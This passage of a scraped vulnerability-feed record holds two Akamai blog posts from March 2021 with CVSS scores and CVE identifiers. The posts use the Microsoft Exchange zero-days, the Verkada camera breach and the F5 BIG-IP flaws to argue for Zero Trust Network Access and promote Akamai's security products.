incidents. \n\nThis month kicked off with multiple zero-day exploits being used to attack on-premises versions of Microsoft Exchange Server. And, as if that wasn't enough, that attack was quickly followed by the news that a hacktivist \"collective\" calling itself APT-69420 claims to have breached the internal systems of the Silicon Valley firm Verkada. That particular breach has garnered widespread press coverage as the group claims to have gained access to live video feeds from more than 150,000 surveillance cameras. \n\nFor me, both of these incidents -- and the responses from the various impacted firms -- brought to mind what we as an industry have been talking about for a while: [why moats and castles belong in the past](<https://blogs.akamai.com/2017/04/why-moats-and-castles-belong-in-the-past.html>).\n\nFrom my perspective, these incidents represent yet another reason why moving to a Zero Trust security model that leverages a cloud-first approach is the future of security for the majority of us. \n\nWhy? It's pretty simple.\n\nLet's look at the Exchange remote code execution vulnerability first. \n\nMicrosoft strongly urged customers to patch on-premises systems immediately. But, as we all know, patching systems isn't always as easy or quick as it sounds, especially for IT teams that are generally overwhelmed and understaffed. As one would expect, [multiple actors continue to take advantage of unpatched systems to attack organizations with vulnerable on-premises Exchange Servers](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>).\n\n[](<https://blogs.akamai.com/Miscosoft%20Image%201.png>)\n\nAt Akamai, our threat research team rolled out signatures for our web application firewall (WAF), which can stop potentially malicious payloads targeted at vulnerable Microsoft Exchange servers. In other words, Akamai's WAF can block the malicious payload destined for a potentially unpatched system. Clearly, this does not replace patching in the long run, but can buy precious time for IT teams. \n\nIf you are interested in learning more about Akamai's WAF-related Microsoft Exchange server zero-day mitigations, read [How Akamai Can Help You Fight the Latest Exploitation Attempts Against Microsoft Exchange](<https://blogs.akamai.com/2021/03/appsec-protections-for-microsoft-exchange-cve-2021-26855-cve-2021-26857-cve-2021-26858-cve-2021-2706.html>)\n\nThese incidents also raise the larger question: What should and shouldn't be exposed to the public internet?\n\nThat question takes me back to an appropriately titled Gartner report from 2016 called [\"It's Time to Isolate Your Services From the Internet Cesspool\"](<https://www.gartner.com/en/documents/3463617/it-s-time-to-isolate-your-services-from-the-internet-ces>) that gives some pretty clear guidance on that front. The answer is fairly simple: only expose to the internet what you absolutely have to; and for those services, make sure the appropriate security controls are in place.\n\nThat brings me to the second piece of major news, the Verkada hack. \n\nAs with most breaches, there are still a lot of open questions and conjecture, but what has emerged suggests that [exposing a Jenkins server on the public internet is quite risky](<https://arstechnica.com/information-technology/2021/03/hackers-access-security-cameras-inside-cloudflare-jails-and-hospitals/>). Combine that with the well-understood tactics, techniques, and procedures of most threat actors to obtain system access and use that initial access to pivot to other resources on the network, and you have a recipe for even more risk.\n\nEither way, in both of these cases restricting access to a vulnerable Exchange or Jenkins server through some form of intelligent access control can stop threat actors from reaching resources directly. [I am partial to Zero Trust Network Access](<https://www.akamai.com/us/en/campaign/assets/reports/gartner-2020-market-guide-for-zero-trust-network-access.jsp>) (ZTNA) approaches that limit who can send malicious payloads targeted at the vulnerable systems. Obviously, this doesn't remove the vulnerability, but restricting access to a potentially vulnerable server through ZTNA can stop any malicious actors from reaching it directly. \n\n[](<https://blogs.akamai.com/Microsoft%20Image2.png>)\n\nIf external actors can't reach a vulnerable system directly, they need to redirect their efforts to reaching it through impersonating an actual end user, which becomes increasingly difficult with the use of contextual, adaptive, and identity aware access controls, such as ZTNA reinforced with FIDO2-compliant multi-factor authentication. Combine those access controls with an inline WAF and a positive picture emerges. Control who has access and inspect traffic flows for anything malicious, even for users who have control.\n\nThe bottom line: Both of these incidents highlight the need to [move to a zero trust-based security model](<https://www.akamai.com/us/en/solutions/security/zero-trust-security-model.jsp>). \n\nIf you are interested in learning more, I suggest you start with [Akamai Secure Access Service Edge](<https://www.akamai.com/sase>) and our [Enterprise Defender solution](<https://www.akamai.com/us/en/multimedia/documents/product-brief/enterprise-defender-product-brief.pdf>), which combines ZTNA, Secure Web Gateway, Web Application Firewall, and application acceleration as one simple-to-consume security service delivered at the Akamai edge.\n\nIsn't it time to effectively isolate apps and APIs from the internet? \n\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-15T22:15:00", "type": "akamaiblog", "title": "Microsoft Exchange and Verkada Hacks: Isolate Your Apps and APIs from the Internet Cesspool", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-2706"], "modified": "2021-03-15T21:50:30", "id": "AKAMAIBLOG:09A31B56FFEA13FBA5985C1B2E66133B", "href": "http://feedproxy.google.com/~r/TheAkamaiBlog/~3/qbi2avdhkGQ/microsoft-exchange-and-verkada-hacks-isolate-your-apps-and-apis-from-the-internet-cesspool.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-24T18:27:13", "description": "The past month has been a very dynamic time in the world of security for hackers and threat researchers, but it has been an extended nightmare for CSOs responsible for securing their enterprise networks. \n\nFor starters, on-premise Microsoft Exchange servers were attacked in droves after a set of zero-day vulnerabilities were discovered, resulting in [widespread infiltration of hundreds of thousands of organizations](<https://www.zdnet.com/article/microsoft-exchange-server-attacks-theyre-being-hacked-faster-than-we-can-count-says-security-company/>). These vulnerabilities allow malicious actors to remotely control machines, read emails, and gain access to internal corporate assets. To illustrate how widespread this attack was, in the two days following the disclosure, Akamai observed [over 290,000 unique attempts to scan and/or exploit these vulnerabilities on our global platform](<https://blogs.akamai.com/2021/03/appsec-protections-for-microsoft-exchange-cve-2021-26855-cve-2021-26857-cve-2021-26858-cve-2021-2706.html>). Microsoft rapidly issued patches for the vulnerability, but the breadth and scale of the breaches won't be truly known for some time, with some enterprises experiencing advanced persistent threats as a result of the exploit.\n\nAs if this wasn't already bad enough, customers of IT security company F5, which has included almost all of the world's Fortune 50 companies, found themselves rocked with [yet another set of highly severe application vulnerabilities](<https://thehackernews.com/2021/03/latest-f5-big-ip-bug-under-active.html>), this time for F5's BIG-IP family of load balancing and security products. These vulnerabilities allow for remote execution of system commands, potentially allowing complete control of the server, interception, and redirection of web traffic, decryption of traffic destined for web servers, and infiltration as a jump host to reach other areas of the network. The National Vulnerability Database ranked these vulnerabilities as critical, some with a [CVSS rating](<https://nvd.nist.gov/vuln-metrics/cvss>) as high as 9.9 out of 10.\n\nBoth of these vulnerabilities, which are actively being exploited by real-world attackers, involve robust highly-utilized systems that have authentication built directly in. So how did this happen?\n\n## Application Authentication\n\nIn both the Microsoft Exchange and F5 BIG-IP products, authentication is required before privileged activities can be performed. While this is an important and required facet of security, many individuals falsely assume that this authentication, which is applied at the application level, provides ample protection.\n\nThis is a misconception, however. If an end user can reach an application such that it prompts them to enter credentials, they have already caused code to execute. This is true regardless of the authentication method or prompt. It does not matter whether the application redirects an end user to an IdP or asks for a username and password directly; the very act of asking for credentials means the application was contacted over the network, code was executed, and a response was tendered to the end user.\n\nAnd this is where the problem lies. Applications are written by human beings, and human beings make mistakes. This is at the heart of the vulnerabilities within Microsoft Exchange and F5 BIG-IP. In both cases, there were incorrect checks against the authentication, which allowed payloads to bypass valid logins and result in exploitation. In other words, the very fact that the systems are reachable is enough to exploit them.\n\nIf you can't trust that the application is implemented perfectly, then what can you do?\n\n## Network Authentication\n\nThe right answer to this problem has been known for quite some time: tie the authentication to not only the application but to the network as well. Zero Trust Network Access is one such method to do this. In a Zero Trust environment, a proxy sits between an enterprise's internal network assets and the users who wish to access them. Basic network communication cannot be established until the end user's identity has been established.\n\nThe authenticators that can be used in a Zero Trust environment tend to be far richer than a VPN, including user identity, groups, device posture, multi-factor authentication (MFA), time of day, location, user and entity behavior analytics (UEBA), client reputation, and more. Only once the proxy has validated the authentication and deter